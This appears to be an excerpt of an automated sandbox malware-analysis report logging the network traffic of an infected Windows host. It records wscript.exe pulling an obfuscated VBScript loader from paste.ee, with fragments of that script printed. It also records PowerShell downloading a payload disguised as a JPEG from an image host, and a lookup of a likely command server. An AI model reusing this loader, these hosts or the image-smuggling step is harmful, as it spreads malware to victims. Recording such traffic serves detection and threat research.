Feb 13, 2024 21:13:55.113343954 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.113349915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.113389015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.113389015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.113620996 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:55.113663912 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:55.117664099 CET	49701	443	192.168.2.6	172.67.215.45

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 13, 2024 21:13:49.673625946 CET	62134	53	192.168.2.6	1.1.1.1
Feb 13, 2024 21:13:49.792026997 CET	53	62134	1.1.1.1	192.168.2.6
Feb 13, 2024 21:13:53.285171986 CET	55807	53	192.168.2.6	1.1.1.1
Feb 13, 2024 21:13:53.591991901 CET	53	55807	1.1.1.1	192.168.2.6
Feb 13, 2024 21:13:58.944494963 CET	60542	53	192.168.2.6	1.1.1.1
Feb 13, 2024 21:13:59.265779018 CET	53	60542	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 13, 2024 21:13:49.673625946 CET	192.168.2.6	1.1.1.1	0xc69e	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Feb 13, 2024 21:13:53.285171986 CET	192.168.2.6	1.1.1.1	0x2324	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Feb 13, 2024 21:13:58.944494963 CET	192.168.2.6	1.1.1.1	0xf00c	Standard query (0)	winderswonders.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 13, 2024 21:13:49.792026997 CET	1.1.1.1	192.168.2.6	0xc69e	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
Feb 13, 2024 21:13:49.792026997 CET	1.1.1.1	192.168.2.6	0xc69e	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false
Feb 13, 2024 21:13:53.591991901 CET	1.1.1.1	192.168.2.6	0x2324	No error (0)	uploaddeimagens.com.br		172.67.215.45	A (IP address)	IN (0x0001)	false
Feb 13, 2024 21:13:53.591991901 CET	1.1.1.1	192.168.2.6	0x2324	No error (0)	uploaddeimagens.com.br		104.21.45.138	A (IP address)	IN (0x0001)	false
Feb 13, 2024 21:13:59.265779018 CET	1.1.1.1	192.168.2.6	0xf00c	Server failure (2)	winderswonders.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49699	104.21.84.67	80	5612	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Feb 13, 2024 21:13:49.917215109 CET	149	OUT	GET /d/JZHbW HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
Feb 13, 2024 21:13:50.108501911 CET	792	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 13 Feb 2024 20:13:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://paste.ee/d/JZHbW CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FG0EyqUQ1eHEZL3u66%2F8%2BvcB1eg9%2BVEoIU1qBnKIIOCgnjRgpTc4hrupWUoFjpETYxujhGITa638TVAZyfv1rsT7xs521lKp8lso%2FN3tRUto4%2BqGC8KScwXxGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 854fbbf34c3412ea-ATL alt-svc: h3=":443"; ma=86400 Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Feb 13, 2024 21:13:50.108516932 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49700	104.21.84.67	443	5612	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-13 20:13:50 UTC	149	OUT	GET /d/JZHbW HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
2024-02-13 20:13:50 UTC	1232	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 20:13:50 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gu9NXnR1GRAd5UeI1rllQdiy6ietS9YelYsp2YaUyePB3mruxeo53gahoH8rvbZLQ9qK051VNRfg%2BKslvPFfbAkt0nZeST%2BZHH7BEKzZV8Vgb3NZBEz2q8ZYvg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 854fbbf71a944570-ATL alt-svc: h3=":443"; ma=86400
2024-02-13 20:13:50 UTC	137	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 2c 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 2c 20 61 67 6e 6f 73 69 61 20 2c 20 69 6e 66 65 63 74 6f 20 2c 20 7a 61 69 6d 6f 20 2c 20 43 61 6d 61 20 2c 20 7a 61 69 6d 6f 31 0d 0a 20 20 20 20 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 61 67 6e 6f 73 69 61 20 20 3d 20 22 22 20 26 20 69 6e 66 Data Ascii: 1f7f dim desmaninhar , odontogenia , agnosia , infecto , zaimo , Cama , zaimo1 odontogenia = " " agnosia = "" & inf
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72 65 43 44 67 Data Ascii: ecto & odontogenia & infecto & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDg
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 61 51 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 47 67 44 67 54 72 65 64 51 42 6d 44 67 54 72 65 47 59 44 67 54 72 65 62 44 67 54 72 65 42 6c 44 Data Ascii: e7DgTreCDgTreDgTre" & infecto & odontogenia & infecto & "gBvDgTreHIDgTre" & infecto & odontogenia & infecto & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlD
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 63 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 45 44 67 54 72 65 62 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 33 44 67 54 72 65 46 38 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 77 42 6c 44 67 54 72 65 43 34 44 67 54 72 65 61 67 42 77 44 67 54 72 65 47 63 44 67 54 72 65 50 77 44 67 54 72 65 78 44 67 54 72 65 44 63 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 33 44 67 54 72 Data Ascii: DgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTre" & infecto & odontogenia & infecto & "QB3DgTreF8DgTreaQBtDgTreGEDgTre" & infecto & odontogenia & infecto & "wBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTr
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 4c 67 42 55 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 52 51 42 75 44 67 54 72 65 47 4d 44 67 54 72 65 62 77 42 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 46 30 44 67 54 72 65 4f 67 44 67 54 72 65 36 44 67 54 72 65 46 55 44 67 54 72 65 56 44 67 54 72 65 42 47 44 67 54 72 65 44 67 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 77 44 67 54 72 65 6f 44 Data Ascii: DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre" & infecto & odontogenia & infecto & "wDgTreoD
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 55 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 45 38 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 67 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 Data Ascii: e" & infecto & odontogenia & infecto & "QBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTre" & infecto & odontogenia & infecto & "QB4DgTreE8DgTre" & infecto & odontogenia & infecto & "gDgTreoDgTreCQDgTre" & infecto & odontogenia & infecto & "QBuDgTreGQDgT
2024-02-13 20:13:50 UTC	1089	IN	Data Raw: 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 69 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 44 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 50 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 Data Ascii: o & odontogenia & infecto & "QB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTr
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 31 30 65 62 0d 0a 45 4d 44 67 54 72 65 62 77 42 74 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 4b 51 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 44 67 54 72 65 42 42 44 67 54 72 65 48 4d 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 59 67 42 73 44 67 54 72 65 48 6b 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 54 44 67 54 72 65 48 6b 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 55 44 67 54 72 65 Data Ascii: 10ebEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTre" & infecto & odontogenia & infecto & "DgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTre
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 65 45 63 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 30 44 67 54 72 65 45 30 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 30 44 67 54 72 65 47 67 44 67 54 72 65 62 77 42 6b 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 57 44 67 54 72 65 45 45 44 67 54 72 65 53 51 44 67 54 72 65 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4c 67 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 64 67 42 76 44 67 54 72 65 47 73 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 Data Ascii: eEcDgTre" & infecto & odontogenia & infecto & "QB0DgTreE0DgTre" & infecto & odontogenia & infecto & "QB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTre" & infecto & odontogenia & infecto & "QDgTreoDgTreCQDg
2024-02-13 20:13:50 UTC	1369	IN	Data Raw: 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 74 e2 98 9f c3 b0 2a 28 e2 98 a0 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 6d 2e 28 40 28 e2 97 80 28 40 c3 b8 e2 98 9e 40 e2 88 9e 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 6e 76 e2 98 9f c3 b0 2a 28 e2 98 a0 72 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 74 5d 3a 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 26 20 22 3a 46 72 40 c3 b8 e2 98 9e 40 e2 88 9e 22 0d 0a 20 20 20 20 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 3d 20 Data Ascii: maninhar = desmaninhar & "t(" desmaninhar = desmaninhar & "m.(@((@@" desmaninhar = desmaninhar & "nv(r" desmaninhar = desmaninhar & "t]:" desmaninhar = desmaninhar & ":Fr@@" desmaninhar =

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49701	172.67.215.45	443	3564	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-13 20:13:53 UTC	124	OUT	GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-02-13 20:13:54 UTC	693	IN	HTTP/1.1 200 OK Date: Tue, 13 Feb 2024 20:13:54 GMT Content-Type: image/jpeg Content-Length: 8369614 Connection: close Last-Modified: Mon, 05 Feb 2024 14:34:33 GMT ETag: "65c0f1f9-7fb5ce" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 1183 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uxaunf6QE4gWtfINUG1pyZeulXBOVljhsxo4GRslKY%2BeXDKKJSXLlSjkGnutVWjrPiU6LWAgcXbiM1LIR%2BweLDn5UL4Lb2RIatBGJRPJt8JinnsI7prZTdudPSLy29gcPgoO2BJB1tqi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 854fbc0ce80e53f9-ATL alt-svc: h3=":443"; ma=86400
2024-02-13 20:13:54 UTC	676	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 39 35 0a ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 Data Ascii: JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95CCp"
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: 00 02 11 03 11 00 3f 00 ec 41 f5 38 14 9b 87 b9 a8 d9 fd f0 29 0b 64 72 4d 7e cf 63 f2 24 bb 92 97 18 e3 83 4c dd 8f ad 33 70 02 90 9a 18 58 90 b1 f5 14 c2 de 99 35 1e ff 00 41 48 ce 7d 7f 2a 2c 57 a0 f2 7d e9 15 88 61 c8 e3 bd 47 bb 3d e9 a1 8e 70 39 a2 c2 d4 99 f0 5b 23 a7 a5 46 7a f5 e3 d2 9a 5b 07 1d 0d 37 7f bd 26 86 3f 75 37 34 9b 85 34 b6 09 e7 22 98 27 7d 81 8f 4e 73 4d 0d c8 19 f7 a0 91 d4 d2 6d 04 f4 a2 e6 97 1c ed 8f ad 30 b7 eb 41 fa e6 9a 7d 28 b8 58 70 6e 3d 68 ce 7d aa 3a 46 7e 28 b8 0f 63 c9 15 19 3e f4 c6 6e 7d e9 03 64 fb d2 b8 c9 0b 63 f9 53 1b bf 3f 85 21 6e 47 a5 04 e4 e7 b5 17 1a 42 83 8f a5 21 7c 1a 42 c7 1d a9 84 93 45 c6 d0 e2 f9 f6 a6 96 18 e0 e6 9a cd e9 4d 0e 57 b7 e9 45 c9 6b b0 f6 6c 53 0b 1c f3 cd 21 6c f5 a6 1e 09 e7 8a 68 Data Ascii: ?A8)drM~c$L3pX5AH}*,W}aG=p9[#Fz[7&?u744"'}NsMm0A}(Xpn=h}:F~(c>n}dcS?!nGB!\|BEMWEklS!lh
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: 1b ab fb 29 b4 2b 2b 28 f4 c4 86 fa 19 64 79 b5 01 21 2d 70 ad ca a1 5e 83 6f 62 09 f7 15 9d cf a1 fc 7a d6 62 71 ec 26 05 06 3e 33 83 4e 0a 4f 63 52 2a 67 b5 26 c5 62 df 87 f5 eb ff 00 0b df b5 ee 9b 2a c3 72 d1 34 05 99 43 fc 8c 06 ec 02 31 9e 01 cf b5 66 95 2d b9 9d 89 76 c9 24 e4 e4 9e 4f 3f 8f 5a 98 a6 3d 40 f6 a8 8f b7 34 79 96 97 46 47 b7 04 f6 1f af 7c 51 c5 38 02 73 9e 0d 33 69 ce 33 c7 bd 03 4a c3 1b 07 38 38 a6 b4 65 71 90 09 eb ef 53 2e 41 0c 40 38 e6 96 66 32 be ec 63 da 8b 85 ae 56 da 73 e9 df 14 85 3b e2 a4 27 9a 4a 41 62 17 18 14 8a bb fb e3 eb 52 95 19 f6 a8 dd 70 38 eb 4c 08 c8 db df 34 94 1c e7 9a 2a 86 26 71 d3 ad 0c c7 6e 33 c1 e4 d2 d0 29 58 07 da dd 4f 63 3a 4f 6d 2c 90 4c 87 2b 24 67 0c 38 ec 7a f2 0e 0d 46 d9 6c b3 12 4b 72 7b f3 Data Ascii: )++(dy!-p^obzbq&>3NOcRg&br4C1f-v$O?Z=@4yFG\|Q8s3i3J88eqS.A@8f2cVs;'JAbRp8L4*&qn3)XOc:Om,L+$g8zFlKr{
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: b0 9b 28 03 14 b4 a1 4b 90 14 12 49 c0 c7 52 69 a7 70 dc 55 23 6d 31 7a e3 34 e9 a0 92 dd ca c8 85 18 73 82 30 79 e9 4c 0b 43 18 f3 c1 f5 a4 a0 f5 a2 a4 41 49 b7 18 a5 a2 90 00 ef f9 51 49 d0 9f 7e 69 73 52 02 30 c8 3e bd 7f 2a 61 07 07 db fc e6 9e 58 7a fb 53 c2 c4 62 72 ce 44 a3 01 40 03 1f 42 73 4d 30 20 28 47 b5 30 8c 75 a9 58 9c 8e 73 4d 35 77 1a d4 4c 71 48 46 29 d4 52 34 1b f8 52 53 99 71 4d a0 06 49 c7 6c 8a 68 19 20 74 cd 48 c3 22 a3 c6 08 3d e9 dc 63 a4 8d a3 23 3d f0 7f 0a 6d 39 9c be 37 12 69 b4 30 b0 51 45 15 24 b4 27 bd 2f 07 a5 14 54 8a c0 e0 29 c0 39 03 bf 6f 53 52 4b 6f 24 0b 13 49 1b 22 ca bb a3 66 e0 32 e7 a8 a8 f1 c8 ed fa d3 9e 59 24 08 1d d9 c2 0d aa 09 c8 51 9c f0 3b 50 2d 86 d0 14 91 9c 71 eb 45 00 9c 11 9e 0d 00 35 8f 4a 4a 07 26 Data Ascii: (KIRipU#m1z4s0yLCAIQI~isR0>*aXzSbrD@BsM0 (G0uXsM5wLqHF)R4RSqMIlh tH"=c#=m97i0QE$'/T)9oSRKo$I"f2Y$Q;P-qE5JJ&
2024-02-13 20:13:54 UTC	1369	IN	Data Raw: c7 74 26 78 f5 3e d4 84 60 f2 30 7d e9 41 28 41 07 04 50 cc 5c 92 4e 4f 73 4c 76 13 1c 83 e9 4b d6 8e b4 01 9a 4c 96 14 51 40 19 a9 00 a5 e8 69 08 c5 28 c7 7a 00 3a 9f 53 fa d2 93 c7 4a 6d 14 00 53 4f 26 9e 46 06 73 51 f7 eb c5 3b 00 ee bc 54 67 8c f7 a9 8a 32 a0 62 08 0d 9c 66 a3 23 26 90 d0 32 6c 08 72 09 3d 87 6f ad 34 1c 0e 94 b8 c7 7a 36 d0 31 68 a5 03 34 63 9a 00 4c d2 e3 8f 7a 30 70 69 3f 43 eb 40 0a 41 53 cf 06 92 9d 92 ed c9 c9 e0 52 50 02 52 d2 51 40 0a 4e 4d 25 14 50 01 4b d8 d1 8c f6 cd 27 f5 a0 03 a7 b5 3c c8 cd 08 43 ca 83 9c fb 9e c4 d3 29 db c8 52 a0 e0 1e 71 40 00 20 0c 52 d2 75 1d 29 b4 0a c4 d0 95 66 e7 81 44 98 0e 76 fd d3 fa 54 43 fc e2 94 37 18 ed 4b 51 13 5a dd 4b 65 73 15 c4 0e 63 9e 26 0e 92 0e a0 8e 46 3e 86 8b ab 99 6f 6e 65 b8 Data Ascii: 